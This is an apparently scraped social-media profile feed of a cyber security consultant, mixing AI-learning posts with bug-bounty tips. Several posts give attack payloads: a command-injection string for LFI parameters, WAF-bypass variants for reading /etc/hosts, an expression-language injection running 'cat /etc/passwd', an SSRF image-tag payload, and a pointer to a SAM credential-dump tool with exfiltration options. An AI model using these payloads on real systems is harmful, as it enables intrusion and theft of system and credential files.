Olivia
Online
R0d3!v
@andre_achy
Cyber security consultant
Joined May 2020
306 Following
50 Followers
192 Posts
Cybercab has started production
This 2 hour Stanford lecture will teach you more about how LLMs like ChatGPT & Claude are built than most people working at top AI companies learn in their entire careers.
Bookmark this & give 2 hours today, no matter what. It'll be the most productive thing you do this week.
@luca_varan C est quand tu m as pas de sous qu on te fait cela …
"Linear Algebra"
The SECOND best book with ~1000 practice problems. MUST for AI & ML.
Absolutely beginner friendly. Available FREE.
Download → https://t.co/DYqSbMlLZu
How I found #IDOR and #dataleak vulnerabilities in 3 days (beginner-friendly)
https://t.co/KW9F0Zn6qr
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #BugBounty #xss #infosec #wafbypass #CyberSecurity #bugbountytips @NullSecurityX @viehgroup @4osp3l
Parameter: &Path= ❎LFI ✅RCE
if you ever got a LFI vector parameter, then not just try LFI payloads.
Payload for RCE: "|id||"
Join my BugBounty telegram channel: https://t.co/J6uPf8H57o
SAMDump: Extracts SAM and SYSTEM using Volume Shadow Copy (VSS) API with multiple exfiltration options and XOR obfuscation https://t.co/53NX6yr2AV
HELLO I AM TRYING TO RECORD TOMORROW'S VIDEO
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
✨ I have more bypass methods, if you wants more Join my BugBounty telegram channel 👉🏼https://t.co/LeJHHPweci
Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more https://t.co/iB3ppUeLOs #InfoSec #BugBounty #bugbountytips #CyberSecurity
#exploit
High severity Windows vulnerabilities:
1⃣. CVE-2025-26686:
RCE in Windows 10/11/Srv TCP/IP stack - https://t.co/ks9DLxM6Hu
// leaves sensitive memory unlocked, allowing remote attackers to hijack systems. Exploitable over the network, it risks full compromise. Patch now..
2⃣. CVE-2025-60710:
LPE in Taskhost Windows Tasks - https://t.co/QOBzG92NXn
// Improper link resolution before file access ('link following') in Host Process for Windows Tasks allows an authorized attacker to elevate privileges locally
3⃣. CVE-2025-54110:
Windows Kernel Integer Overflow Privilege Escalation - https://t.co/v2BYVahxQS
// high-severity vulnerability in Windows Kernel that arises from improper handling of integer values during memory allocation
4⃣ CVE-2025-54918:
Improper authentication in Windows NTLM- https://t.co/u7IsCV5PRM
// Simulated exploitation and mitigation of CVE-2025-54918 (Win NTLM flaw). Incl. detection scripts, Ansible patching, CI/CD hardening. Demonstrates PrivEsc from low-level access to SYSTEM in hybrid cloud environments
SSRF in pdf generation! 🔥
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
credit: @darkshadow2bd
#BugBounty #tips #bugbountytips
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
✅POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
For More Join my BugBounty Telegram Channel: https://t.co/J6uPf8H57o
Cheers to NextGen Xiao YiKang from the Department of Electrical Engineering! His pioneering SiC MOSFET transient modeling and flexible commutated power semiconductor have won him the IET Postgraduate Research Award 🏆, making him Asia’s only awardee this year.
Deep dive into Android Pentesting
Covered everything from static & dynamic analysis, Frida, Drozer, SSL pinning bypass, deep links, broadcast receivers, ADB, and more.
If you're into mobile security, this one's packed with real-world scenarios & tools
https://t.co/FGoBd8kuSd
🚨 New Writeup Alert! 🚨
"When Session Fixation Meets Session Confusion: A Case of Cross-User Control" by Erkan Kavas is now live on IW!
Check it out here: https://t.co/kzeVDZTcLh
#authorization #bugbountywriteup #bugbounty #bugbountytips #ethicalhacking
https://t.co/uckOKJeLUb
For the life of me I can never remember the registry tweaks to avoid TPM checks when installing Win11 in a VM. I finally took note of the `reg add` commands to just copy and paste into the Shift+F10 terminal.
reg add "HKLM\SYSTEM\Setup\LabConfig" /f
reg add "HKLM\SYSTEM\Setup\LabConfig" /v BypassTPMCheck /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\Setup\LabConfig" /v BypassSecureBootCheck /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\Setup\LabConfig" /v BypassRAMCheck /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\Setup\LabConfig" /v BypassCPUCheck /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\Setup\LabConfig" /v BypassStorageCheck /t REG_DWORD /d 1 /f
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.4M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.5M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.4M followers
Taylor Swift
@taylorswift13
81.2M followers
Lady Gaga
@ladygaga
72.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.5M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.2M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.5M followers